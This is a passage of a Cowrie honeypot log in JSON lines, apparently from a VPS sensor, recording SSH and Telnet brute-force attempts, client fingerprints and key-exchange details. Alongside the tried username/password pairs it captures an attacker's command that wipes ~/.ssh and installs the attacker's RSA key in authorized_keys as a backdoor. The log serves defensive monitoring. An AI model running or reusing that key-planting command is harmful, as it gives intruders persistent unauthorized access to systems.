group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:30:48.744447Z","src_ip":"212.227.125.160","session":"74ed750ea529"}
{"eventid":"cowrie.login.failed","username":"developer","password":"admin123","message":"login attempt [developer/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:30:52.063835Z","src_ip":"212.227.125.160","session":"74ed750ea529"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:30:53.751549Z","src_ip":"212.227.125.160","session":"74ed750ea529"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":60278,"dst_ip":"1.2.3.4","dst_port":22,"session":"7310f9f8bb2e","protocol":"ssh","message":"New connection: 82.67.125.95:60278 (1.2.3.4:22) [session: 7310f9f8bb2e]","sensor":"my-vps","timestamp":"2025-08-31T01:31:12.507179Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:31:12.508102Z","src_ip":"82.67.125.95","session":"7310f9f8bb2e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:31:12.545128Z","src_ip":"82.67.125.95","session":"7310f9f8bb2e"}
{"eventid":"cowrie.login.success","username":"root","password":"123qwe-=","message":"login attempt [root/123qwe-=] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:31:12.729553Z","src_ip":"82.67.125.95","session":"7310f9f8bb2e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:31:12.823817Z","src_ip":"82.67.125.95","session":"7310f9f8bb2e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:31:12.824531Z","src_ip":"82.67.125.95","session":"7310f9f8bb2e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:31:12.825758Z","src_ip":"82.67.125.95","session":"7310f9f8bb2e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:31:12.863010Z","src_ip":"82.67.125.95","session":"7310f9f8bb2e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:31:12.993193Z","src_ip":"82.67.125.95","session":"7310f9f8bb2e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:31:12.993920Z","src_ip":"82.67.125.95","session":"7310f9f8bb2e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:31:13.031964Z","src_ip":"82.67.125.95","session":"7310f9f8bb2e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:31:13.032859Z","src_ip":"82.67.125.95","session":"7310f9f8bb2e"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":60282,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1017d806678","protocol":"ssh","message":"New connection: 82.67.125.95:60282 (1.2.3.4:22) [session: e1017d806678]","sensor":"my-vps","timestamp":"2025-08-31T01:31:13.067327Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:31:13.068247Z","src_ip":"82.67.125.95","session":"e1017d806678"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:31:13.104539Z","src_ip":"82.67.125.95","session":"e1017d806678"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:31:13.291344Z","src_ip":"82.67.125.95","session":"e1017d806678"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:31:14.331493Z","src_ip":"82.67.125.95","session":"e1017d806678"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":60298,"dst_ip":"1.2.3.4","dst_port":22,"session":"30941380feef","protocol":"ssh","message":"New connection: 82.67.125.95:60298 (1.2.3.4:22) [session: 30941380feef]","sensor":"my-vps","timestamp":"2025-08-31T01:31:14.366089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:31:14.366849Z","src_ip":"82.67.125.95","session":"30941380feef"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:31:14.402337Z","src_ip":"82.67.125.95","session":"30941380feef"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:31:14.583987Z","src_ip":"82.67.125.95","session":"30941380feef"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:31:14.620642Z","src_ip":"82.67.125.95","session":"7310f9f8bb2e"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:31:14.621638Z","src_ip":"82.67.125.95","session":"30941380feef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":26200,"dst_ip":"1.2.3.4","dst_port":23,"session":"30dd983a4362","protocol":"telnet","message":"New connection: 212.227.235.229:26200 (1.2.3.4:23) [session: 30dd983a4362]","sensor":"my-vps","timestamp":"2025-08-31T01:31:16.086028Z"}
{"eventid":"cowrie.session.connect","src_ip":"151.234.246.83","src_port":35015,"dst_ip":"1.2.3.4","dst_port":23,"session":"c324fccfbac8","protocol":"telnet","message":"New connection: 151.234.246.83:35015 (1.2.3.4:23) [session: c324fccfbac8]","sensor":"my-vps","timestamp":"2025-08-31T01:31:17.382319Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39196,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd03837051ae","protocol":"ssh","message":"New connection: 212.227.235.229:39196 (1.2.3.4:22) [session: fd03837051ae]","sensor":"my-vps","timestamp":"2025-08-31T01:31:28.849800Z"}
{"eventid":"cowrie.session.closed","duration":13.21671986579895,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:31:29.302651Z","src_ip":"212.227.235.229","session":"30dd983a4362"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:31:29.746235Z","src_ip":"212.227.235.229","session":"fd03837051ae"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:31:29.746950Z","src_ip":"212.227.235.229","session":"fd03837051ae"}
{"eventid":"cowrie.login.failed","username":"developer","password":"root123","message":"login attempt [developer/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:31:35.764892Z","src_ip":"212.227.235.229","session":"fd03837051ae"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:31:37.686082Z","src_ip":"212.227.235.229","session":"fd03837051ae"}
{"eventid":"cowrie.session.closed","duration":30.578921794891357,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:31:47.961165Z","src_ip":"151.234.246.83","session":"c324fccfbac8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58222,"dst_ip":"1.2.3.4","dst_port":22,"session":"1917054223f0","protocol":"ssh","message":"New connection: 212.227.125.160:58222 (1.2.3.4:22) [session: 1917054223f0]","sensor":"my-vps","timestamp":"2025-08-31T01:31:51.475166Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:31:51.707191Z","src_ip":"212.227.125.160","session":"1917054223f0"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":17530,"dst_ip":"1.2.3.4","dst_port":22,"session":"710f8e0939da","protocol":"ssh","message":"New connection: 102.88.137.80:17530 (1.2.3.4:22) [session: 710f8e0939da]","sensor":"my-vps","timestamp":"2025-08-31T01:31:51.743425Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:31:51.744428Z","src_ip":"102.88.137.80","session":"710f8e0939da"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:31:51.873771Z","src_ip":"102.88.137.80","session":"710f8e0939da"}
{"eventid":"cowrie.login.failed","username":"spider","password":"spider","message":"login attempt [spider/spider] failed","sensor":"my-vps","timestamp":"2025-08-31T01:31:52.431926Z","src_ip":"102.88.137.80","session":"710f8e0939da"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:31:53.484573Z","src_ip":"212.227.125.160","session":"1917054223f0"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:31:53.563446Z","src_ip":"102.88.137.80","session":"710f8e0939da"}
{"eventid":"cowrie.login.failed","username":"developer","password":"root123","message":"login attempt [developer/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:31:56.151196Z","src_ip":"212.227.125.160","session":"1917054223f0"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:31:57.805477Z","src_ip":"212.227.125.160","session":"1917054223f0"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":41466,"dst_ip":"1.2.3.4","dst_port":22,"session":"72caaa754a77","protocol":"ssh","message":"New connection: 82.67.125.95:41466 (1.2.3.4:22) [session: 72caaa754a77]","sensor":"my-vps","timestamp":"2025-08-31T01:32:12.037602Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:32:12.038568Z","src_ip":"82.67.125.95","session":"72caaa754a77"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:32:12.075683Z","src_ip":"82.67.125.95","session":"72caaa754a77"}
{"eventid":"cowrie.login.failed","username":"opus","password":"opus","message":"login attempt [opus/opus] failed","sensor":"my-vps","timestamp":"2025-08-31T01:32:12.262627Z","src_ip":"82.67.125.95","session":"72caaa754a77"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:32:13.301601Z","src_ip":"82.67.125.95","session":"72caaa754a77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49836,"dst_ip":"1.2.3.4","dst_port":22,"session":"8cf898c64d70","protocol":"ssh","message":"New connection: 212.227.235.229:49836 (1.2.3.4:22) [session: 8cf898c64d70]","sensor":"my-vps","timestamp":"2025-08-31T01:32:31.812610Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:32:32.200102Z","src_ip":"212.227.235.229","session":"8cf898c64d70"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 